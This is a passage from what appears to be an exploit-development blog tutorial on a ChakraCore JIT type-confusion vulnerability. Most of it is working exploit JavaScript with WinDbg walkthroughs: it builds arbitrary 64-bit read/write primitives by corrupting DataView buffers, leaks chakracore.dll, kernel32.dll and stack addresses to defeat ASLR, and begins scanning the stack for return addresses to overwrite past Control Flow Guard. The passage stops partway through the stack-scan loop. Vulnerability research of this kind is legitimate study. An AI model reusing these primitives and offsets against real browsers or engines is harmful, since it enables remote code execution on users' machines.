Note that in the above code, the base address of the .data section kernel32.dll can be found with the following WinDbg command: !dh kernel32. Recall also that we can only write/read in 32-bit boundaries, as DataView (in Chakra/ChakraCore) only supplies methods that work on unsigned integers as high as a 32-bit boundary. There are no direct 64-bit writes.

Our target address will be kernel32_base + 0xA4000, based on our current version of Windows 10.

Let’s now run our exploit.js script in ch.exe, by way of WinDbg.

To begin the process, let’s first set a breakpoint on our first print() debug statement via ch!WScriptJsrt::EchoCallback. When we hit this breakpoint, after resuming execution, let’s set a breakpoint on chakracore!Js::DynamicTypeHandler::AdjustSlots. We aren’t particularly interested in this function, which as we know will perform the type transition on our o object as a result of the tmp function setting its prototype, but we know that in the call stack we will see the address of the JIT’d function opt(), which performs the type confusion vulnerability.

Examining the call stack, we can clearly see our opt() function.

Let’s set a breakpoint on the instruction which will overwrite the auxSlots pointer of the o object.

We can inspect R15 and R11 to confirm that we have our o object, who’s auxSlots pointer is about to be overwritten with the obj object.

We can clearly see that the o->auxSlots pointer is updated with the address of obj.

This is exactly how we would expect our vulnerability to behave. After the opt(o, o, obj) function is called, the next step in our script is the following:

// Corrupt obj->auxSlots with the address of the first DataView object
o.c = dataview1;

We know that by setting a value on o.c we will actually end up corrupting obj->auxSlots with the address of our first DataView object. Recalling the previous image, we know that obj->auxSlots is located at 0x12b252a52b0.

Let’s set a hardware breakpoint to break whenever this address is written to at an 8-byte alignment.

Taking a look at the disassembly, it is clear to see how SetSlotUnchecked indexes the auxSlots array (or what it thinks is the auxSlots array) by computing an index into an array.

Let’s take a look at the RCX register, which should be obj->auxSlots (located at 0x12b252a52b0).

However, we can see that the value is no longer the auxSlots array, but is actually a pointer to a DataView object! This means we have successfully overwritten obj->auxSlots with the address of our dataview DataView object!

Now that our o.c = dataview1 operation has completed, we know the next instruction will be as follows:

// Corrupt dataview1->buffer with the address of the second DataView object
obj.h = dataview2;

Let’s update our script to set our print() debug statement right before the obj.h = dataview2 instruction and restart execution in WinDbg.

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;

function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Print debug statement

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // Set dataview2->buffer to kernel32.dll .data section (which is writable)
    dataview1.setUint32(0x38, 0x5b3d0000+0xa4000, true);
    dataview1.setUint32(0x3C, 0x00007fff, true);

    // Overwrite kernel32.dll's .data section's first 8 bytes with 0x4141414141414141
    dataview2.setUint32(0x0, 0x41414141, true);
    dataview2.setUint32(0x4, 0x41414141, true);


We know from our last debugging session that the function chakracore!Js::DynamicTypeHandler::SetSlotUnchecked was responsible for updating o.c = dataview1. Let’s set another breakpoint here to view our obj.h = dataview2 line of code in action.

After hitting the breakpoint, we can examine the RCX register, which contains the in-scope dynamic object passed to the SetSlotUnchecked function. We can clearly see this is our obj object, as obj->auxSlots points to our dataview1 DataView object.

We can then set a breakpoint on our final mov qword ptr [rcx+rax*8], rdx instruction, which we previously have seen, which will perform our obj.h = dataview2 instruction.

After hitting the instruction, we can see that our dataview1 object is about to be operated on, and we can see that the buffer of our dataview1 object currently points to 0x24471ebed0.

After the write operation, we can see that dataview1->buffer now points to our dataview2 object.

Again, to reiterate, we can do this type of operation because of our type confusion vulnerability, where ChakraCore doesn’t know we have corrupted obj->auxSlots with the address of another object, our dataview1 object. When we execute obj.h = dataview2, ChakraCore treats obj as still having a valid auxSlots pointer, which it doesn’t, and it will attempt to update the obj.h entry within auxSlots (which is really a DataView object). Because dataview1->buffer is stored where ChakraCore thinks obj.h is stored, we corrupt this value to the address of our second DataView object, dataview2.

Let’s now set a breakpoint, as we saw earlier in the blog post, on the setUint32() method of our DataView object, which will perform the final object corruption and, shortly, our arbitrary write. We also can entirely clear out all other breakpoints.

After hitting our breakpoint, we can then scroll through the disassembly of EntrySetUint32() and set a breakpoint on chakracore!Js::DataView::SetValue, as we have previously showcased in this blog post.

After hitting this breakpoint, we can scroll through the disassembly and set a final breakpoint on the other SetValue() method.

Within this method function, we know mov dword ptr [rax], ecx is the instruction responsible ultimately for writing to the in-scope DataView object’s buffer. Let’s clear out all breakpoints, and focus solely on this instruction.

After hitting this breakpoint, we know that RAX will contain the address we are going to write into. As we talked about in our exploitation strategy, this should be dataview2->buffer. We are going to use the setUint32() method provided by dataview1 in order to overwrite dataview2->buffer’s address with a raw 64-bit value (broken up into two write operations).

Looking in the RCX register above, we can also actually see the β€œlower” part of kernel32.dll’s .data section - the target address we would like to perform an arbitrary write to.

We now can step through the mov dword ptr [rax], ecx instruction and see that dataview2->buffer has been partially overwritten (the lower 4 bytes) with the lower 4 bytes of kernel32.dll’s .data section!

Perfect! We can now press g in the debugger to hit the mov dword ptr [rax], ecx instruction again. This time, the setUint32() operation should write the upper part of the kernel32.dll .data section’s address, thus completing the full pointer-sized arbitrary write primitive.

After hitting the breakpoint and stepping through the instruction, we can inspect RAX again to confirm this is dataview2 and we have fully corrupted the buffer pointer with an arbitrary address 64-bit address with no NaN-boxing effect! This is perfect, because the next time dataview2 goes to set its buffer, it will use the kernel32.dll address we provided, thinking this is its buffer! Because of this, whatever value we now supply to dataview2.setUint32() will actually overwrite kernel32.dll’s .data section! Let’s view this in action by again pressing g in the debugger to see our dataview2.setUint32() operations.

As we can see below, when we hit our breakpoint again the buffer address being used is located in kernel32.dll, and our setUint32() operation writes 0x41414141 into the .data section! We have achieved an arbitrary write!

We then press g in the debugger once more, to write the other 32-bits. This leads to a full 64-bit arbitrary write primitive!

Perfect! What this means is that we can first set dataview2->buffer, via dataview1.setUint32(), to any 64-bit address we would like to overwrite. Then we can use dataview2.setUint32() in order to overwrite the provided 64-bit address! This also bodes true anytime we would like to arbitrarily read/dereference memory!

We simply, as the write primitive, set dataview2->buffer to whatever address we would like to read from. Then, instead of using the setUint32() method to overwrite the 64-bit address, we use the getUint32() method which will instead read whatever is located in dataview2->buffer. Since dataview2->buffer contains the 64-bit address we want to read from, this method simply will read 8 bytes from here, meaning we can read/write in 8 byte boundaries!

Here is our full read/write primitive code.

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
	return ${x.toString(16)};

// Arbitrary read function
function read64(lo, hi) {
	dataview1.setUint32(0x38, lo, true); 		// DataView+0x38 = dataview2->buffer
	dataview1.setUint32(0x3C, hi, true);		// We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

	// Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
	// Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
	var arrayRead = new Uint32Array(0x10);
	arrayRead[0] = dataview2.getUint32(0x0, true); 	// 4-byte arbitrary read
	arrayRead[1] = dataview2.getUint32(0x4, true);	// 4-byte arbitrary read

	// Return the array
	return arrayRead;

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
	dataview1.setUint32(0x38, lo, true); 		// DataView+0x38 = dataview2->buffer
	dataview1.setUint32(0x3C, hi, true);		// We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

	// Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
	dataview2.setUint32(0x0, valLo, true);		// 4-byte arbitrary write
	dataview2.setUint32(0x4, valHi, true);		// 4-byte arbitrary write

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // From here we can call read64() and write64()


We can see we added a few things above. The first is our hex() function, which really is just for β€œpretty printing” purposes. It allows us to convert a value to hex, which is obviously how user-mode addresses are represented in Windows.

Secondly, we can see our read64() function. This is practically identical to what we displayed with the arbitrary write primitive. We use dataview1 to corrupt the buffer of dataview2 with the address we want to read from. However, instead of using dataview2.setUint32() to overwrite our target address, we use the getUint32() method to retrieve 0x8 bytes from our target address.

Lastly, write64() is identical to what we displayed in the code before the code above, where we walked through the process of performing an arbitrary write. We have simply β€œtemplatized” the read/write process to make our exploitation much more efficient.

With a read/write primitive, the next step for us will be bypassing ASLR so we can reliably read/write data in memory.

Bypassing ASLR - Chakra/ChakraCore Edition

When it comes to bypassing ASLR, in β€œmodern” exploitation, this requires an information leak. The 64-bit address space is too dense to β€œbrute force”, so we must find another approach. Thankfully, for us, the way Chakra/ChakraCore lays out JavaScript objects in memory will allow us to use our type confusion vulnerability and read primitive to leak a chakracore.dll address quite easily. Let’s recall the layout of a dynamic object in memory.

As we can see above, and as we can recall, the first hidden property of a dynamic object is the vftable. This will always point somewhere into chakracore.dll, and chakra.dll within Edge. Because of this, we can simply use our arbitrary read primitive to set our target address we want to read from to the vftable pointer of the dataview2 object, for instance, and read what this address contains (which is a pointer in chakracore.dll)! This concept is very simple, but we actually can more easily perform it by not using read64(). Here is the corresponding code.

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);

// Arbitrary read function
function read64(lo, hi) {
	dataview1.setUint32(0x38, lo, true); 		// DataView+0x38 = dataview2->buffer
	dataview1.setUint32(0x3C, hi, true);		// We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

	// Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
	// Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
	var arrayRead = new Uint32Array(0x10);
	arrayRead[0] = dataview2.getUint32(0x0, true); 	// 4-byte arbitrary read
	arrayRead[1] = dataview2.getUint32(0x4, true);	// 4-byte arbitrary read

	// Return the array
	return arrayRead;

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
	dataview1.setUint32(0x38, lo, true); 		// DataView+0x38 = dataview2->buffer
	dataview1.setUint32(0x3C, hi, true);		// We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

	// Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
	dataview2.setUint32(0x0, valLo, true);		// 4-byte arbitrary write
	dataview2.setUint32(0x4, valHi, true);		// 4-byte arbitrary write

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0, true);
	vtableHigh = dataview1.getUint32(4, true);

	// Print update
    print("[+] DataView object 2 leaked vtable from ChakraCore.dll: 0x" + hex(vtableHigh) + hex(vtableLo));


We know that in read64() we first corrupt dataview2->buffer with the target address we want to read from by using dataview1.setUint(0x38...). This is because buffer is located at an offset of 0x38 within the a DataView object. However, since dataview1 already acts on the dataview2 object, and we know that the vftable takes up bytes 0x0 through 0x8, as it is the first item of a DataView object, we can just simply using our ability to control dataview2, via dataview1 methods, to just go ahead and retrieve whatever is stored at bytes 0x0 - 0x8, which is the vftable! This is the only time we will perform a read without going through our read64() function (for the time being). This concept is fairly simple, and can be seen by the diagram below.

However, instead of using setUint32() methods to overwrite the vftable, we use the getUint32() method to retrieve the value.

Another thing to notice is we have broken up our read into two parts. This, as we remember, is because we can only read/write 32-bits at a time - so we must do it twice to achieve a 64-bit read/write.

It is important to note that we will not step through the debugger every read64() and write64() function call. This is because we, in great detail, have already viewed our arbitrary write primitive in action within WinDbg. We already know what it looks like to corrupt dataview2->buffer using the builtin DataView method setUint32(), and then using the same method, on behalf of dataview2, to actually overwrite the buffer with our own data. Because of this, anything performed here on out in WinDbg will be purely for exploitation reasons. Here is what this looks like when executed in ch.exe.

If we inspect this address in the debugger, we can clearly see the is the vftable leaked from DataView!

From here, we can compute the base address of chakracore.dll by determining the offset between the vftable entry leak and the base of chakracore.dll.

The updated code to leak the base address of chakracore.dll can be found below:


    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Print update
    print("[+] DataView object 2 leaked vtable from ChakraCore.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

    // Store the base of chakracore.dll
    chakraLo = vtableLo - 0x1961298;
    chakraHigh = vtableHigh;

    // Print update
    print("[+] ChakraCore.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));


Please note that we will omit all code before opt(o, o, obj) from here on out. This is to save space, and because we won’t be changing any code before then. Notice also, again, we have to store the 64-bit address into two separate variables. This is because we can only access data types up to 32-bits in JavaScript (in terms of Chakra/ChakraCore).

For any kind of code execution, on Windows, we know we will need to resolve needed Windows API function addresses. Our exploit, for this part of the blog series, will invoke WinExec to spawn calc.exe (note that in part three we will be achieving a reverse shell, but since that exploit is much more complex, we first will start by just showing how code execution is possible).

On Windows, the Import Address Table (IAT) stores these needed pointers in a section of the PE. Remember that chakracore.dll isn’t loaded into the process space until ch.exe has executed our exploit.js. So, to view the IAT, we need to run our exploit.js, by way of ch.exe, in WinDbg. We need to set a breakpoint on our print() function by way of ch!WScriptJsrt::EchoCallback.

From here, we can run !dh chakracore to see where the IAT is for chakracore, which should contain a table of pointers to Windows API functions leveraged by ChakraCore.

After locating the IAT, we can simply just dump all the pointers located at chakracore+0x17c0000.

As we can see above, we can see that chakracore_iat+0x40 contains a pointer to kernel32.dll (specifically, kernel32!RaiseExceptionStub). We can use our read primitive on this address, in order to leak an address from kernel32.dll, and then compute the base address of kernel32.dll by the same method shown with the vftable leak.

Here is the updated code to get the base address of kernel32.dll:


    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Print update
    print("[+] DataView object 2 leaked vtable from ChakraCore.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

    // Store the base of chakracore.dll
    chakraLo = vtableLo - 0x1961298;
    chakraHigh = vtableHigh;

    // Print update
    print("[+] ChakraCore.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));

    // Leak a pointer to kernel32.dll from ChakraCore's IAT (for who's base address we already have)
    iatEntry = read64(chakraLo+0x17c0000+0x40, chakraHigh);     // KERNEL32!RaiseExceptionStub pointer

    // Store the upper part of kernel32.dll
    kernel32High = iatEntry[1];

    // Store the lower part of kernel32.dll
    kernel32Lo = iatEntry[0] - 0x1d890;

    // Print update
    print("[+] kernel32.dll base address: 0x" + hex(kernel32High) + hex(kernel32Lo));


We can see from here we successfully leak the base address of kernel32.dll.

You may also wonder, our iatEntry is being treated as an array. This is actually because our read64() function returns an array of two 32-bit values. This is because we are reading 64-bit pointer-sized values, but remember that JavaScript only provides us with means to deal with 32-bit values at a time. Because of this, read64() stores the 64-bit address in two separated 32-bit values, which are managed by an array. We can see this by recalling the read64() function.

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getUint32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getUint32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;

We now have pretty much all of the information we need in order to get started with code execution. Let’s see how we can go from ASLR leak to code execution, bearing in mind Control Flow Guard (CFG) and DEP are still items we need to deal with.

Code Execution - CFG Edition

In my previous post on exploiting Internet Explorer, we achieved code execution by faking a vftable and overwriting the function pointer with our ROP chain. This method is not possible in ChakraCore, or Edge, because of CFG.

CFG is an exploit mitigation that validates any indirect function calls. Any function call that performs call qword ptr [reg] would be considered an indirect function call, because there is no way for the program to know what RAX is pointing to when the call happens, so if an attacker was able to overwrite the pointer being called, they obviously can redirect execution anywhere in memory they control. This exact scenario is what we accomplished with our Internet Explorer vulnerability, but that is no longer possible.

With CFG enabled, anytime one of these indirect function calls is executed, we can now actually check to ensure that the function wasn’t overwritten with a nefarious address, controlled by an attacker. I won’t go into more detail, as I have already written about control-flow integrity on Windows before, but CFG basically means that we can’t overwrite a function pointer to gain code execution. So how do we go about this?

CFG is a forward-edge control-flow integrity solution. This means that anytime a call happens, CFG has the ability to check the function to ensure it hasn’t been corrupted. However, what about other control-flow transfer instructions, like a return instruction?

call isn’t the only way a program can redirect execution to another part of a PE or loaded image. ret is also an instruction that redirects execution somewhere else in memory. The way a ret instruction works, is that the value at RSP (the stack pointer) is loaded into RIP (the instruction pointer) for execution. If we think about a simple stack overflow, this is what we do essentially. We use the primitive to corrupt the stack to locate the ret address, and we overwrite it with another address in memory. This leads to control-flow hijacking, and the attacker can control the program.

Since we know a ret is capable of transferring control-flow somewhere else in memory, and since CFG doesn’t inspect ret instructions, we can simply use a primitive like how a traditional stack overflow works! We can locate a ret address that is on the stack (at the time of execution) in an executing thread, and we can overwrite that return address with data we control (such as a ROP gadget which returns into our ROP chain). We know this ret address will eventually be executed, because the program will need to use this return address to return execution to where it was before a given function (who’s return address we will corrupt) is overwritten.

The issue, however, is we have no idea where the stack is for the current thread, or other threads for that manner. Let’s see how we can leverage Chakra/ChakraCore’s architecture to leak a stack address.

Leaking a Stack Address

In order to find a return address to overwrite on the stack (really any active thread’s stack that is still committed to memory, as we will see in part three), we first need to find out where a stack address is. Ivan Fratric of Google Project Zero posted an issue awhile back about this exact scenario. As Ivan explains, a ThreadContext instance in ChakraCore contains stack pointers, such as stackLimitForCurrentThread. The chain of pointers is as follows: type->javascriptLibrary->scriptContext->threadContext. Notice anything about this? Notice the first pointer in the chain - type. As we know, a dynamic object is laid out in memory where vftable is the first hidden property, and type is the second! We already know we can leak the vftable of our dataview2 object (which we used to bypass ASLR). Let’s update our exploit.js to also leak the type of our dataview2 object, in order to follow this chain of pointers Ivan talks about.


    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    print("[+] DataView object 2 leaked vtable from ChakraCore.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

    // Store the base of chakracore.dll
    chakraLo = vtableLo - 0x1961298;
    chakraHigh = vtableHigh;

    // Print update
    print("[+] ChakraCore.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));

    // Leak a pointer to kernel32.dll from ChakraCore's IAT (for who's base address we already have)
    iatEntry = read64(chakraLo+0x17c0000+0x40, chakraHigh);     // KERNEL32!RaiseExceptionStub pointer

    // Store the upper part of kernel32.dll
    kernel32High = iatEntry[1];

    // Store the lower part of kernel32.dll
    kernel32Lo = iatEntry[0] - 0x1d890;

    // Print update
    print("[+] kernel32.dll base address: 0x" + hex(kernel32High) + hex(kernel32Lo));


We can see our exploit controls dataview2->type by way of typeLo and typeHigh.

Let’s now walk these structures in WinDbg to identify a stack address. Load up exploit.js in WinDbg and set a breakpoint on chakracore!Js::DataView::EntrySetUint32. When we hit this function, we know we are bound to see a dynamic object (DataView) in memory. We can then walk these pointers.

After hitting our breakpoint, let’s scroll down into the disassembly and set a breakpoint on the all-familiar SetValue() method.

After setting the breakpoint, we can hit g in the debugger and inspect the RCX register, which should be a DataView object.

The javascriptLibrary pointer is the first item we are looking for, per the Project Zero issue. We can find this pointer at an offset of 0x8 inside the type pointer.

From the javascriptLibrary pointer, we can retrieve the next item we are looking for - a ScriptContext structure. According to the Project Zero issue, this should be at an offset of javascriptLibrary+0x430. However, the Project Zero issue is considering Microsoft Edge, and the Chakra engine. Although we are leveraging CharkraCore, which is identical in most aspects to Chakra, the offsets of the structures are slightly different (when we port our exploit to Edge in part three, we will see we use the exact same offsets as the Project Zero issue). Our ScriptContext pointer is located at javascriptLibrary+0x450.

Perfect! Now that we have the ScriptContext pointer, we can compute the next offset - which should be our ThreadContext structure. This is found at scriptContext+0x3b8 in ChakraCore (the offset is different in Chakra/Edge).

Perfect! After leaking the ThreadContext pointer, we can go ahead and parse this with the dt command in WinDbg, since ChakraCore is open-sourced and we have the symbols.

As we can see above, ChakraCore/Chakra stores various stack addresses within this structure! This is fortunate for us, as now we can use our arbitrary read primitive to locate the stack! The only thing to notice is that this stack address is not from the currently executing thread (our exploiting thread). We can view this by using the !teb command in WinDbg to view information about the current thread, and see how the leaked address fairs.

As we can see, we are 0xed000 bytes away from the StackLimit of the current thread. This is perfectly okay, because this value won’t change in between reboots or ChakraCore being restated. This will be subject to change in our Edge exploit, and we will leak a different stack address within this structure. For now though, let’s use stackLimitForCurrentThread.

Here is our updated code, including the stack leak.


    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    print("[+] DataView object 2 leaked vtable from ChakraCore.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

    // Store the base of chakracore.dll
    chakraLo = vtableLo - 0x1961298;
    chakraHigh = vtableHigh;

    // Print update
    print("[+] ChakraCore.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));

    // Leak a pointer to kernel32.dll from ChakraCore's IAT (for who's base address we already have)
    iatEntry = read64(chakraLo+0x17c0000+0x40, chakraHigh);     // KERNEL32!RaiseExceptionStub pointer

    // Store the upper part of kernel32.dll
    kernel32High = iatEntry[1];

    // Store the lower part of kernel32.dll
    kernel32Lo = iatEntry[0] - 0x1d890;

    // Print update
    print("[+] kernel32.dll base address: 0x" + hex(kernel32High) + hex(kernel32Lo));

    // Leak type->javascriptLibrary (lcoated at type+0x8)
    javascriptLibrary = read64(typeLo+0x8, typeHigh);

    // Leak type->javascriptLibrary->scriptContext (located at javascriptLibrary+0x450)
    scriptContext = read64(javascriptLibrary[0]+0x450, javascriptLibrary[1]);

    // Leak type->javascripLibrary->scriptContext->threadContext
    threadContext = read64(scriptContext[0]+0x3b8, scriptContext[1]);

    // Leak type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread (located at threadContext+0xc8)
    stackAddress = read64(threadContext[0]+0xc8, threadContext[1]);

    // Print update
    print("[+] Leaked stack from type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread!");
    print("[+] Stack leak: 0x" + hex(stackAddress[1]) + hex(stackAddress[0]));

    // Compute the stack limit for the current thread and store it in an array
    var stackLeak = new Uint32Array(0x10);
    stackLeak[0] = stackAddress[0] + 0xed000;
    stackLeak[1] = stackAddress[1];

    // Print update
    print("[+] Stack limit: 0x" + hex(stackLeak[1]) + hex(stackLeak[0]));


Executing the code shows us that we have successfully leaked the stack for our current thread

Now that we have the stack located, we can scan the stack to locate a return address, which we can corrupt to gain code execution.

Locating a Return Address

Now that we have a read primitive and we know where the stack is located. With this ability, we can now β€œscan the stack” in search for any return addresses. As we know, when a call instruction occurs, the function being called pushes their return address onto the stack. This is so the function knows where to return execution after it is done executing and is ready to perform the ret. What we will be doing is locating the place on the stack where a function has pushed this return address, and we will corrupt it with some data we control.

To locate an optimal return address - we can take multiple approaches. The approach we will take will be that of a β€œbrute-force” approach. This means we put a loop in our exploit that scans the entire stack for its contents. Any address of that starts with 0x7fff we can assume was a return address pushed on to the stack (this is actually a slight misnomer, as other data is located on the stack). We can then look at a few addresses in WinDbg to confirm if they are return addresses are not, and overwrite them accordingly. Do not worry if this seems like a daunting process, I will walk you through it.

Let’s start by adding a loop in our exploit.js which scans the stack.


    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    print("[+] DataView object 2 leaked vtable from ChakraCore.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

    // Store the base of chakracore.dll
    chakraLo = vtableLo - 0x1961298;
    chakraHigh = vtableHigh;

    // Print update
    print("[+] ChakraCore.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));

    // Leak a pointer to kernel32.dll from ChakraCore's IAT (for who's base address we already have)
    iatEntry = read64(chakraLo+0x17c0000+0x40, chakraHigh);     // KERNEL32!RaiseExceptionStub pointer

    // Store the upper part of kernel32.dll
    kernel32High = iatEntry[1];

    // Store the lower part of kernel32.dll
    kernel32Lo = iatEntry[0] - 0x1d890;

    // Print update
    print("[+] kernel32.dll base address: 0x" + hex(kernel32High) + hex(kernel32Lo));

    // Leak type->javascriptLibrary (lcoated at type+0x8)
    javascriptLibrary = read64(typeLo+0x8, typeHigh);

    // Leak type->javascriptLibrary->scriptContext (located at javascriptLibrary+0x450)
    scriptContext = read64(javascriptLibrary[0]+0x450, javascriptLibrary[1]);

    // Leak type->javascripLibrary->scriptContext->threadContext
    threadContext = read64(scriptContext[0]+0x3b8, scriptContext[1]);

    // Leak type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread (located at threadContext+0xc8)
    stackAddress = read64(threadContext[0]+0xc8, threadContext[1]);

    // Print update
    print("[+] Leaked stack from type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread!");
    print("[+] Stack leak: 0x" + hex(stackAddress[1]) + hex(stackAddress[0]));

    // Compute the stack limit for the current thread and store it in an array
    var stackLeak = new Uint32Array(0x10);
    stackLeak[0] = stackAddress[0] + 0xed000;
    stackLeak[1] = stackAddress[1];

    // Print update
    print("[+] Stack limit: 0x" + hex(stackLeak[1]) + hex(stackLeak[0]));

    // Scan the stack

    // Counter variable
    let counter = 0;

    // Loop
    while (counter < 0x10000)
        // Store the contents of the stack
        tempContents = read64(stackLeak[0]+counter, stackLeak[1]);

        // Print update
